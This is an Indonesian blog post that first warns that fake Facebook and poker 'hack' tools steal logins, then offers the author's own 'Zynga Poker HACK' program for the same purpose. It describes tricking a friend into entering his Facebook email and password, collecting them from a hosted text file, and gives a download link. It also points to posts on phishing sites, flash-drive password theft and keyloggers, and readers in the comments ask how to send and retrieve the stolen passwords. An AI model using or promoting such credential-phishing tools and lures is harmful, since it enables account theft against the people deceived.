Hacking Facebook Using Application, is it work?


mungkin ada yang pernah gunain program seperti ini

fb hack

fb hack

atau seperti ini?

holdem poker cheater

dan apakah berhasil?

justru malah kita yang bisa kena hack!

loh? kok bisa? sok tahu ente tu!

okay, kita check. dari kedua program itu jelas2 kita disuruh memasukkan email dan password. dan ketika tombol “OK” atau “NEXT” di klik maka program ini akan mengirim email dan password kita tersebut ke sebuah web server.

just beware of it. jangan sekali2 mencoba menggunakan suatu aplikasi yang meminta kita untuk memasukkan email dan password faceboook

merasa tercerahkan?
atau malah merasa penasaran? haha

sekarang coba liat program dibawah

Zynga Poker HACK

sama dengan program lain diatas. program ini juga meminta email dan password facebook..

trus buat apa ente bilang2?

karena ini program bikinan ane, lol
source codenya ane dapat dari codenesia magazine. Sekarang ane coba bahas cara kerjanya..

misal ane punya temen namanya budi (gk kreatif banget si, dari sd namanya budi terus
)
, kebetulan dia suka banget main poker..

Ane : eh bud, gw punya program keren nih, bisa nambahin chip poker secara otomatis!
Budi : beneran? mana sini aku minta..
Ane : nih!, tapi jangan salah masukkin email dan password ente ya
Budi : Sip! beres!

setelah budi kemakan rayuan maut ente, sekarang kita buka link ini
http://sukabiru.000space.com/fb/login.txt (udah di banned sama hostingannya 😩 )

loh? link apaan itu?

jadi semua email dan password yang dimasukkan ke program ini akan kesimpan di link tersebut. tinggal ente pilih mana yang email dan passwordnya budi
wokokoko

wow! keren! tapi ini kan termasuk kejahatan internet ya?

yup, benar. tapi ane disini niatnya ingin berbagi ilmu . apakah termasuk kejahatan tergantung penerapannya, kalo ente pake program ini buat ngerjain temen tentu dosanya bisa kita tanggung sama2

download programnya
http://www.4shared.com/file/IGJLzOub/Zynga_Poker_Hack.html

done!
kalau merasa kesulitan, tinggalkan komen dibawah aja

kali aja minat baca yang lain :

pake fake login/phising. MySpace
caranya bisa liat postingan ane yang ini
bikin situs phising facebook

pake flashdisk
bisa dibaca disini
curi pasword (hanya dengan flashdisk)

pake keylogger
bisa dicek dimari
curi password dengan keylogger

48 pemikiran pada “Hacking Facebook Using Application, is it work?

  1. Ping balik: Trik curi Password Facebook, Friendster, YM dll « Sukabiru | Blog

  2. Ping balik: bikin situs phising facebook « Sukabiru | Blog

  3. Ping balik: Curi Password Orang Lain (hanya) dengan Flashdisk « Sukabiru | Blog

  4. mantap bro, mau tanya nih, kalo mail n passwordnya di kirim ke email kita pake winshock atau SMTP gimana?
    jaga2kalo akun hosting kena suspended….
    mohon bantuanya ya…..

  5. mas bro..
    gmana cara ngelihat password nya kalo’ kita udah ngmasukin email di zynga poker hack itu???
    please jwaban’nya….makasi mas bro…

Tinggalkan komentar